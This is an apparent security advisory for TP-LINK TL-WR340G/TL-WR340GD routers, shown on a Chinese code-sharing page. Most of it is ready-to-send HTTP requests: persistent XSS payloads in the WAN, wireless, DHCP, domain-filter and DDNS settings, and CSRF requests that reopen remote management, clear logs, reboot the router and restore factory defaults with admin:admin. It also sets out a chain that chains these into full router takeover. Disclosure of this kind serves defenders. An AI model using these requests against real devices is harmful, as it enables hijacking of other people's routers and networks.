扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 |
#Title: TP-LINK Model No. TL-WR340G/TL-WR340GD - Multiple Vulnerabilities #Date: 01.07.14 #Vendor: TP-LINK #Affected versions: TL-WR340G/TL-WR340GD #Tested on: Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux #Contact: smash [at] devilteam.pl Persistent Cross Site Scripting vulnerabilities exists because of poor parameters filtration. Our value is stored in javascript array, since it's not correctly verified nor filtered, it is able to inject javascript code. It will be executed whenever user will visit specific settings page. Because of no CSRF prevention, it is able to compromise router. Attacker may force user to restore factory default settings, and then to turn on remote managment; in result, it will be able to log in using default username and password (admin:admin). Config file - 192.168.1.1/userRpm/config.bin #1 - Cross Site Scripting a) Persistent XSS in Network > WAN Settings Vulnerable parameter - hostName. Request: GET /userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E&mtu=1500&Save=Save HTTP/1.1 Host: 192.168.1.1 Response: HTTP/1.1 200 OK Server: Router Connection: close Content-Type: text/html WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G" <SCRIPT language="javascript" type="text/javascript"> var dhcpInf = new Array( 1, (...) "</script><script>alert(123)</script>", 0,0 ); </SCRIPT> (...) b) Persitent XSS in Wireless Settings Vulnerable parameter - ssid. Request: GET /userRpm/WlanNetworkRpm.htm?ssid=%3C%2Fscript%3Exssed%3C%3E®ion=102&channel=6&mode=2&ap=2&broadcast=2&secType=1&secOpt=3&keytype=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1 Host: 192.168.1.1 Response: HTTP/1.1 200 OK Server: Router Connection: close Content-Type: text/html WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G" <SCRIPT language="javascript" type="text/javascript"> var wlanPara = new Array( 5, 0, "</script>xssed<>", 114, 102, 1, 6, 2, 1, 1, 0, "", "", "", "", "", "", 0, 1, "333", 1, "11", 1, "0.0.0.0", 1812, "", "", 86400, 86400, 1, 0,0 ); </SCRIPT> (...) c) Persistent XSS in DHCP Settings Vulnerable parameter - domain. Request: GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=</script><xssed>'"&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save HTTP/1.1 Host: 192.168.1.1 Referer: http://192.168.1.1/userRpm/LanDhcpServerRpm.htm Response: HTTP/1.1 200 OK Server: Router Connection: close Content-Type: text/html WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G" <SCRIPT language="javascript" type="text/javascript"> var DHCPPara = new Array( 1, "192.168.1.100", "192.168.1.199", 120, "0.0.0.0", "</script><xssed>'\"", "0.0.0.0", "0.0.0.0", 1, 1, 0,0 ); </SCRIPT> (...) d) Persitent XSS in Security > Domain Filtering Vulnerable parameter - domain; value is being validated by js to prevent illegal characters in domain name. It is able to avoid this filtration by sending raw http request. Request: GET /userRpm/DomainFilterRpm.htm?begintime=0000&endtime=2400&domain=hm</script><xssed>'"&State=1&Changed=1&SelIndex=0&Page=1&Save=Save HTTP/1.1 Host: 192.168.1.1 Response: HTTP/1.1 200 OK Server: Router Connection: close Content-Type: text/html WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G" <SCRIPT language="javascript" type="text/javascript"> var domainFilterList = new Array( "0000-2400", "hm</script><xssed>'\"", 1, 0,0 ); </SCRIPT> (...) e) Persistent XSS in Dynamic DNS Settings Vulnerable parameters - username & cliUrl. Request: GET /userRpm/DynDdnsRpm.htm?provider=2&username=&pwd=&cliUrl=</script><script>alert(123)</script>&Save=Save HTTP/1.1 Host: 192.168.1.1 Response: HTTP/1.1 200 OK Server: Router Connection: close Content-Type: text/html WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G" <SCRIPT language="javascript" type="text/javascript"> var serInf = new Array( "", "", "</script><script>alert(123)</script>", 0, 0, 2, 2, 0, 1, 0,0 ); </SCRIPT> (...) #2 - CSRF a) Change LAN IP Parameter lanip stands for further ip. GET /userRpm/NetworkLanCfgRpm.htm?lanip=192.168.1.2&lanmask=255.255.255.0&Save=Save HTTP/1.1 Host: 192.168.1.1 b) Change remote managment settings GET /userRpm/ManageControlRpm.htm?port=80&ip=0.0.0.0&Save=Save HTTP/1.1 Host: 192.168.1.1 c) Clear syslog GET /userRpm/SystemLogRpm.htm?Clearlog=Clear+All HTTP/1.1 Host: 192.168.1.1 d) Reboot device GET /userRpm/SysRebootRpm.htm?Reboot=Reboot HTTP/1.1 Host: 192.168.1.1 e) Restore factory defaults (admin:admin) GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1 Host: 192.168.1 |
体验盒子
